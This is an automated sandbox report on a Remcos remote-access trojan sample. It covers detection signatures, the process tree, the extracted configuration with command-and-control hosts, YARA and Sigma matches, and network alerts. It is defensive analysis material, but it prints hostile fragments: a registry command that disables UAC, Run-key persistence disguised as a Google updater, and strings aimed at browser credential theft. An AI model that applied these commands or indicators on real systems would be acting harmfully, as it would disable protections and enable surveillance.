Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DB5rQYsfd6.exe

Overview

General Information

Sample name:DB5rQYsfd6.exe
renamed because original name is a hash value
Original sample name:991e707e324731f86a43900e34070808.exe
Analysis ID:1589220
MD5:991e707e324731f86a43900e34070808
SHA1:5b5afd8cecb865de3341510f38d217f47490eead
SHA256:32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates an undocumented autostart registry key
Delayed program exit found
Disables UAC (registry)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Potentially Suspicious GoogleUpdate Child Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • DB5rQYsfd6.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\DB5rQYsfd6.exe" MD5: 991E707E324731F86A43900E34070808)
    • cmd.exe (PID: 7328 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7380 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • wscript.exe (PID: 7420 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • GoogleUpdate.exe (PID: 7888 cmdline: C:\ProgramData\GoogleDat\GoogleUpdate.exe MD5: 991E707E324731F86A43900E34070808)
          • cmd.exe (PID: 7904 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7992 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • svchost.exe (PID: 7944 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • GoogleUpdate.exe (PID: 8112 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • GoogleUpdate.exe (PID: 8180 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • GoogleUpdate.exe (PID: 1184 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • GoogleUpdate.exe (PID: 1608 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • GoogleUpdate.exe (PID: 7592 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • GoogleUpdate.exe (PID: 7844 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["198.50.242.157:443:0", "apleegodfivem.ddns.net:443:0"], "Assigned name": "paydaytry", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "GoogleUpdate.exe", "Startup value": "ChromeUpdater", "Hide file": "Disable", "Mutex": "Attempt-S4A0CI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "GoogleDat", "Keylog folder": "bootdata", "Keylog file max size": "0"}
SourceRuleDescriptionAuthorStrings
DB5rQYsfd6.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
    DB5rQYsfd6.exeWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x679e0:$a1: Remcos restarted by watchdog!
    • 0x67f38:$a3: %02i:%02i:%02i:%03i
    • 0x682bd:$a4: * Remcos v
    DB5rQYsfd6.exeREMCOS_RAT_variantsunknownunknown
    • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x61a0c:$str_b2: Executing file:
    • 0x62b28:$str_b3: GetDirectListeningPort
    • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x62630:$str_b7: \update.vbs
    • 0x61a34:$str_b9: Downloaded file:
    • 0x61a20:$str_b10: Downloading file:
    • 0x61ac4:$str_b12: Failed to upload file:
    • 0x62af0:$str_b13: StartForward
    • 0x62b10:$str_b14: StopForward
    • 0x625d8:$str_b15: fso.DeleteFile "
    • 0x6256c:$str_b16: On Error Resume Next
    • 0x62608:$str_b17: fso.DeleteFolder "
    • 0x61ab4:$str_b18: Uploaded file:
    • 0x61a74:$str_b19: Unable to delete:
    • 0x625a0:$str_b20: while fso.FileExists("
    • 0x61f49:$str_c0: [Firefox StoredLogins not found]
    DB5rQYsfd6.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
    • 0x61900:$s1: \Classes\mscfile\shell\open\command
    • 0x61960:$s1: \Classes\mscfile\shell\open\command
    • 0x61948:$s2: eventvwr.exe
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\bootdata\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\ProgramData\GoogleDat\GoogleUpdate.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
        C:\ProgramData\GoogleDat\GoogleUpdate.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x679e0:$a1: Remcos restarted by watchdog!
        • 0x67f38:$a3: %02i:%02i:%02i:%03i
        • 0x682bd:$a4: * Remcos v
        C:\ProgramData\GoogleDat\GoogleUpdate.exeREMCOS_RAT_variantsunknownunknown
        • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x61a0c:$str_b2: Executing file:
        • 0x62b28:$str_b3: GetDirectListeningPort
        • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x62630:$str_b7: \update.vbs
        • 0x61a34:$str_b9: Downloaded file:
        • 0x61a20:$str_b10: Downloading file:
        • 0x61ac4:$str_b12: Failed to upload file:
        • 0x62af0:$str_b13: StartForward
        • 0x62b10:$str_b14: StopForward
        • 0x625d8:$str_b15: fso.DeleteFile "
        • 0x6256c:$str_b16: On Error Resume Next
        • 0x62608:$str_b17: fso.DeleteFolder "
        • 0x61ab4:$str_b18: Uploaded file:
        • 0x61a74:$str_b19: Unable to delete:
        • 0x625a0:$str_b20: while fso.FileExists("
        • 0x61f49:$str_c0: [Firefox StoredLogins not found]
        C:\ProgramData\GoogleDat\GoogleUpdate.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
        • 0x61900:$s1: \Classes\mscfile\shell\open\command
        • 0x61960:$s1: \Classes\mscfile\shell\open\command
        • 0x61948:$s2: eventvwr.exe
        SourceRuleDescriptionAuthorStrings
        0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x131e0:$a1: Remcos restarted by watchdog!
          • 0x13738:$a3: %02i:%02i:%02i:%03i
          • 0x13abd:$a4: * Remcos v
          00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x131e0:$a1: Remcos restarted by watchdog!
            • 0x13738:$a3: %02i:%02i:%02i:%03i
            • 0x13abd:$a4: * Remcos v
            00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 58 entries
              SourceRuleDescriptionAuthorStrings
              20.2.GoogleUpdate.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                20.2.GoogleUpdate.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x679e0:$a1: Remcos restarted by watchdog!
                • 0x67f38:$a3: %02i:%02i:%02i:%03i
                • 0x682bd:$a4: * Remcos v
                20.2.GoogleUpdate.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
                • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x61a0c:$str_b2: Executing file:
                • 0x62b28:$str_b3: GetDirectListeningPort
                • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x62630:$str_b7: \update.vbs
                • 0x61a34:$str_b9: Downloaded file:
                • 0x61a20:$str_b10: Downloading file:
                • 0x61ac4:$str_b12: Failed to upload file:
                • 0x62af0:$str_b13: StartForward
                • 0x62b10:$str_b14: StopForward
                • 0x625d8:$str_b15: fso.DeleteFile "
                • 0x6256c:$str_b16: On Error Resume Next
                • 0x62608:$str_b17: fso.DeleteFolder "
                • 0x61ab4:$str_b18: Uploaded file:
                • 0x61a74:$str_b19: Unable to delete:
                • 0x625a0:$str_b20: while fso.FileExists("
                • 0x61f49:$str_c0: [Firefox StoredLogins not found]
                20.2.GoogleUpdate.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
                • 0x61900:$s1: \Classes\mscfile\shell\open\command
                • 0x61960:$s1: \Classes\mscfile\shell\open\command
                • 0x61948:$s2: eventvwr.exe
                18.0.GoogleUpdate.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  Click to see the 83 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, ProcessId: 7904, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\GoogleDat\GoogleUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DB5rQYsfd6.exe, ProcessId: 7308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe
                  Source: Process startedAuthor: Tim Rauch: Data: Command: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, ProcessId: 7904, ProcessName: cmd.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\GoogleDat\GoogleUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DB5rQYsfd6.exe, ProcessId: 7308, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater
                  Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T20:06:59.266497+010020327761Malware Command and Control Activity Detected192.168.2.449732198.50.242.157443TCP
                  2025-01-11T20:07:00.309527+010020327761Malware Command and Control Activity Detected192.168.2.449734198.50.242.157443TCP
                  2025-01-11T20:07:01.318590+010020327761Malware Command and Control Activity Detected192.168.2.449735198.50.242.157443TCP
                  2025-01-11T20:07:02.397228+010020327761Malware Command and Control Activity Detected192.168.2.449737198.50.242.157443TCP
                  2025-01-11T20:07:03.399869+010020327761Malware Command and Control Activity Detected192.168.2.449739198.50.242.157443TCP
                  2025-01-11T20:07:04.414344+010020327761Malware Command and Control Activity Detected192.168.2.449740198.50.242.157443TCP
                  2025-01-11T20:07:05.448168+010020327761Malware Command and Control Activity Detected192.168.2.449741198.50.242.157443TCP
                  2025-01-11T20:07:06.465323+010020327761Malware Command and Control Activity Detected192.168.2.449742198.50.242.157443TCP
                  2025-01-11T20:07:07.480680+010020327761Malware Command and Control Activity Detected192.168.2.449743198.50.242.157443TCP
                  2025-01-11T20:07:08.494840+010020327761Malware Command and Control Activity Detected192.168.2.449744198.50.242.157443TCP
                  2025-01-11T20:07:09.537509+010020327761Malware Command and Control Activity Detected192.168.2.449745198.50.242.157443TCP
                  2025-01-11T20:07:10.554086+010020327761Malware Command and Control Activity Detected192.168.2.449746198.50.242.157443TCP
                  2025-01-11T20:07:11.569699+010020327761Malware Command and Control Activity Detected192.168.2.449747198.50.242.157443TCP
                  2025-01-11T20:07:12.585073+010020327761Malware Command and Control Activity Detected192.168.2.449748198.50.242.157443TCP
                  2025-01-11T20:07:13.600743+010020327761Malware Command and Control Activity Detected192.168.2.449749198.50.242.157443TCP
                  2025-01-11T20:07:14.632838+010020327761Malware Command and Control Activity Detected192.168.2.449751198.50.242.157443TCP
                  2025-01-11T20:07:15.757004+010020327761Malware Command and Control Activity Detected192.168.2.449755198.50.242.157443TCP
                  2025-01-11T20:07:16.773532+010020327761Malware Command and Control Activity Detected192.168.2.449757198.50.242.157443TCP
                  2025-01-11T20:07:17.788117+010020327761Malware Command and Control Activity Detected192.168.2.449759198.50.242.157443TCP
                  2025-01-11T20:07:18.803624+010020327761Malware Command and Control Activity Detected192.168.2.449760198.50.242.157443TCP
                  2025-01-11T20:07:19.819483+010020327761Malware Command and Control Activity Detected192.168.2.449761198.50.242.157443TCP
                  2025-01-11T20:07:20.834935+010020327761Malware Command and Control Activity Detected192.168.2.449762198.50.242.157443TCP
                  2025-01-11T20:07:21.850624+010020327761Malware Command and Control Activity Detected192.168.2.449763198.50.242.157443TCP
                  2025-01-11T20:07:22.866137+010020327761Malware Command and Control Activity Detected192.168.2.449764198.50.242.157443TCP
                  2025-01-11T20:07:23.887024+010020327761Malware Command and Control Activity Detected192.168.2.449765198.50.242.157443TCP
                  2025-01-11T20:07:24.928755+010020327761Malware Command and Control Activity Detected192.168.2.449766198.50.242.157443TCP
                  2025-01-11T20:07:25.944710+010020327761Malware Command and Control Activity Detected192.168.2.449767198.50.242.157443TCP
                  2025-01-11T20:07:26.960713+010020327761Malware Command and Control Activity Detected192.168.2.449768198.50.242.157443TCP
                  2025-01-11T20:07:27.976225+010020327761Malware Command and Control Activity Detected192.168.2.449769198.50.242.157443TCP
                  2025-01-11T20:07:28.991401+010020327761Malware Command and Control Activity Detected192.168.2.449770198.50.242.157443TCP
                  2025-01-11T20:07:30.007408+010020327761Malware Command and Control Activity Detected192.168.2.449771198.50.242.157443TCP
                  2025-01-11T20:07:31.038067+010020327761Malware Command and Control Activity Detected192.168.2.449772198.50.242.157443TCP
                  2025-01-11T20:07:32.053765+010020327761Malware Command and Control Activity Detected192.168.2.449773198.50.242.157443TCP
                  2025-01-11T20:07:33.022685+010020327761Malware Command and Control Activity Detected192.168.2.449774198.50.242.157443TCP
                  2025-01-11T20:07:33.960000+010020327761Malware Command and Control Activity Detected192.168.2.449775198.50.242.157443TCP
                  2025-01-11T20:07:34.866131+010020327761Malware Command and Control Activity Detected192.168.2.449776198.50.242.157443TCP
                  2025-01-11T20:07:35.756966+010020327761Malware Command and Control Activity Detected192.168.2.449777198.50.242.157443TCP
                  2025-01-11T20:07:36.620872+010020327761Malware Command and Control Activity Detected192.168.2.449778198.50.242.157443TCP
                  2025-01-11T20:07:37.444263+010020327761Malware Command and Control Activity Detected192.168.2.449779198.50.242.157443TCP
                  2025-01-11T20:07:38.248909+010020327761Malware Command and Control Activity Detected192.168.2.449780198.50.242.157443TCP
                  2025-01-11T20:07:39.022812+010020327761Malware Command and Control Activity Detected192.168.2.449781198.50.242.157443TCP
                  2025-01-11T20:07:39.773188+010020327761Malware Command and Control Activity Detected192.168.2.449782198.50.242.157443TCP
                  2025-01-11T20:07:40.507209+010020327761Malware Command and Control Activity Detected192.168.2.449783198.50.242.157443TCP
                  2025-01-11T20:07:41.210066+010020327761Malware Command and Control Activity Detected192.168.2.449784198.50.242.157443TCP
                  2025-01-11T20:07:41.882445+010020327761Malware Command and Control Activity Detected192.168.2.449785198.50.242.157443TCP
                  2025-01-11T20:07:42.538183+010020327761Malware Command and Control Activity Detected192.168.2.449786198.50.242.157443TCP
                  2025-01-11T20:07:43.163423+010020327761Malware Command and Control Activity Detected192.168.2.449787198.50.242.157443TCP
                  2025-01-11T20:07:43.772801+010020327761Malware Command and Control Activity Detected192.168.2.449788198.50.242.157443TCP
                  2025-01-11T20:07:44.366401+010020327761Malware Command and Control Activity Detected192.168.2.449789198.50.242.157443TCP
                  2025-01-11T20:07:45.949450+010020327761Malware Command and Control Activity Detected192.168.2.449790198.50.242.157443TCP
                  2025-01-11T20:07:46.506853+010020327761Malware Command and Control Activity Detected192.168.2.449791198.50.242.157443TCP
